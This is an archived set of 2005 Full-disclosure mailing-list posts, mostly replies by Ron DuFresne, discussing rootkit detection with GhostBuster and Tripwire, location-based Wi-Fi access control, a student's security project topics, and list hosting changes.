On Thu, 17 Mar 2005, Paul Laudanski wrote:

> by Darren W. Miller, aka defendingthenet, CastleCops Staff Writer
> March 14, 2005
>
> Monday morning, 6am; the electric rooster is telling you it's time to
> start a new work week. A shower, some coffee, and you're in the car and
> off.  On the way to work you're thinking of all you need to accomplish
> this week.  Then, on top of that there's the recent merger between your
> company and a competitor. One of your associates told you, you better be
> on your toes because rumors of layoffs are floating around.
>
> More: http://castlecops.com/article-5807-nested-0-0.html
>
>

gov workers don't even need to be bribed with chocolate;

http://www.securityfocus.com/news/10708?ref=rss

Thanks,

Ron DuFresne


Re: [Full-disclosure] Microsoft GhostBuster Opinions

2005-03-17 Thread Ron DuFresne
On Thu, 17 Mar 2005, Dave King wrote:

> [EMAIL PROTECTED] wrote:
>
> >On Thu, 17 Mar 2005 11:28:55 MST, Dave King said:
> >
> >
> >
> >>Also, this is not just like tripwire.  If the kernel is compromised
> >>and reporting false data to tripwire then tripwire can run along merrily
> >>thinking every thing's great.  This is why booting to a trusted kernel
> >>is important for the process.  Exploiting Software by Hoglund and McGraw
> >>has a discussion on these types of rootkits.  Tripwire, however does
> >>great at detecting other sorts of intrusions.
> >>
> >>
> >
> >Actually, the "prior art" *is* tripwire.  If you run tripwire on the live
> >system, then run it while booted from a CD, and they produce different
> >results, you have a problem.
> >
> >And that's what they're doing by doing a 'dir /a /s' on the live system,
> >then booting the Windows PE CD, and looking for differences
> >
> >
> Ok, this is true.  I guess what I meant by what I said was running
> tripwire as a cron job daily or whatever on a system without booting to
> a known good kernel could yield incorrect results if the kernel has been
> compromised.  A similar result can be had using tripwire on the system
> then booting to a known good kernel and running it again.
>

If the kernel is modified, on a windows or *nix system, you are going to
have a clear clue upfront; the system will have rebooted.  Course, a
failing system that reboots or blue screens every few weeks rather than
runs stable unless there is a total power outage or a maint window when such
things are done is another problem altogether...

Of course, I'm not sure you understand what tripwire is or does, further
research might be in order.

Thanks,

Ron DuFresne


Re: [Full-disclosure] Wi-fi. Approaching customers

2005-03-15 Thread Ron DuFresne
On Wed, 16 Mar 2005, Gregh wrote:

[HEADERS SNIPPED]

>
>
> >
> >>From what little I read on their site, it seems to be a radius auth mech
> > based upon MAC addresses.
> >
>
> Isn't that basically what a lot of wi-fi broadband router/modems do anyway?
>
> Eg, set up a netgear DG834 (think it was) and it was having problems with 
> auto assigned IPs for lan members so shortcut the problem by telling it to 
> manually assign IP number to MAC so that each time a MAC came in range it got 
> the same IP number always. I set the IP numbers manually at each client 
> computer and thus they would only connect using that number. Connection 
> problems died off instantly, then. The upshot is that if the MAC is unknown, 
> it can't get access now even if the WEP is successfully decrypted. Wouldn't 
> that radius auth be basically that idea?
>

That's what I read, as well as a lot of talk about "location-enabled
network or LENs", which, the more reading I do, gives the impression they
have some kind of GPS functionality involved; this is the only way I can
make any real sense of their claims to be able to segment the wLAN into
locations and determine a sense of perimeter limits and location sense.
Of course, I'm trying to give the benefit of the doubt and read that they
actually sell what they are claiming in marketing lit.

Thanks,


Ron DuFresne


Re: [Full-disclosure] Wi-fi. Approaching customers

2005-03-15 Thread Ron DuFresne

>From what little I read on their site, it seems to be a radius auth mech
based upon MAC addresses.

Thanks,

Ron DuFresne


On Tue, 15 Mar 2005, KF (Lists) wrote:

> hrmm... is that based on signal strength or something?
> -KF
>
> Ryan Sumida wrote:
> >
> > As a side note..
> >
> > Newbury Networks has a product called WiFi Watchdog that can allow/deny
> > access based on physical location.  As an example, it can be configured
> > where anyone outside the building walls can not connect to the network
> > but once they move inside the building they are allowed access.  Sounds
> > like black magic but it works (a rep came down and showed us a demo
> > yesterday) and can help manage who gets on an open WiFi network like
> > Matthew's.
> >
> > Ryan Sumida
> > Network Services, CSU Long Beach
> >
> >
> > [EMAIL PROTECTED] wrote on 03/15/2005 01:27:43 PM:
> >
> >  >
> >  > Matthew Sabin wrote:
> >  >
> >  > > My company has made a conscious decision to leave our WiFi open to
> >  > visitors, while our internal machines connect via IPSec on the open
> > airwaves.
> >  > > A drive-by would show the open nature of our WiFi, but wouldn't
> >  > immediately tell you that we've secured our business fairly well.
> >  >
> >  > but what if someone uses your unsecured network to download copyrighted
> >  > material (just mp3s are enough :->) or to send porn?
> >  >
> >  > An unsecured WiFi may have serious legal consequences.
> >  >
> >  > And to come back on the original topic: These legal consequences may be
> >  > good arguments to convince customers that they need to get their network
> >  > secured.
> >  >
> >  > Ciao
> >  > Marcus
> >  >
> >  > --
> >  > Hail Eris! Hail Discordia!
> >
> >
> > 
> >
>



Re: [Full-disclosure] Wi-fi. Approaching customers

2005-03-15 Thread Ron DuFresne
On Tue, 15 Mar 2005, Ryan Sumida wrote:

> As a side note..
>
> Newbury Networks has a product called WiFi Watchdog that can allow/deny
> access based on physical location.  As an example, it can be configured
> where anyone outside the building walls can not connect to the network but
> once they move inside the building they are allowed access.  Sounds like
> black magic but it works (a rep came down and showed us a demo yesterday)
> and can help manage who gets on an open WiFi network like Matthew's.


demos are neat, and many I've seen compare to the nice glossy marketing
pamphlets and power point presentations that mgt loves.  Course as a
techie, I'd want to see the product working in a live setup prior to
making a perhaps costly blunder.

Thanks,

Ron DuFresne


[Full-disclosure] Ideas for school project...

2005-03-15 Thread Ron
Hi everybody,
I'm taking a fourth year University course called "Topics in Computer 
Security."  One of our assignments is a "major project" (probably a 10 
or so page report, although she hasn't been very specific on the 
requirements) that's due in a few weeks.  We have been given a choice of 
topics, and we are required to do research on what we choose.

I am fairly well versed in all of these fields, and they all interest 
me.  I have a creative block, and can't think of anything exciting 
to do with any of these. 

I'm hoping that somebody can suggest an interesting area that fits under 
one of these topics that is worth investigating, or perhaps a recently 
published paper that discusses it in an interesting way.

Thanks to anybody who can help, and no, I'm not asking anybody to do 
homework for me.  I'm just hoping that somebody says something which 
sparks some creativity.

-Ron
The topics are:
* Malicious logic.
* Intrusion detection.
* Denial of service attacks in computer networks.
* Security issues in sensor networks
* Program security.
Thanks again!


Re: [Full-disclosure] Administrivia: A new home for FD

2005-03-09 Thread Ron DuFresne


Nor to read the whole announcement Administrivia about the change in
hosting sites and how to change your passwd and how to fix your settings
for the list.  The reading impaired should just unsubscribe.

Thanks,

Ron DuFresne

On Wed, 9 Mar 2005 [EMAIL PROTECTED] wrote:

>
> I tend to agree though. I used to get just digest now I'm getting
> inundated and with this mail am doing the same to others no doubt. After
> recently getting chewed out for accidentally auto-responding to the debian
> security announce list, I tend to agree that it shouldn't be that hard to
> get things like this right.
>
> Pete
>
> On Wed, 9 Mar 2005, Nick FitzGerald wrote:
>
> > Eckard Brauer wrote:
> >
> > > The bad point indeed is that I lost the digest mode and get all messages
> > > immediately since that. Could you please check the configuration...
> >
> > I wonder who changes this guy's nappies still??
> >
> >
> > Regards,
> >
> > Nick FitzGerald
> >
> >
>
>
>
> Peter Fuggle
> Network & Systems Administrator
> The School of Physics
> The University of Melbourne
> p: +61 3 8344 5432
> e: [EMAIL PROTECTED]
>
>
> This e-mail and any attachments may contain personal information or
> information that is otherwise confidential or the subject of copyright.
>
> Any use, disclosure or copying of any part of it is prohibited.
>
> The University does not warrant that this email or any attachments are free
> from viruses or defects. Please check any attachments for viruses and defects
> before opening them.
>
> If this e-mail is received in error please delete it and notify us by return
> e-mail.
>
> The University does not necessarily share or endorse the views expressed in
> this email.
>
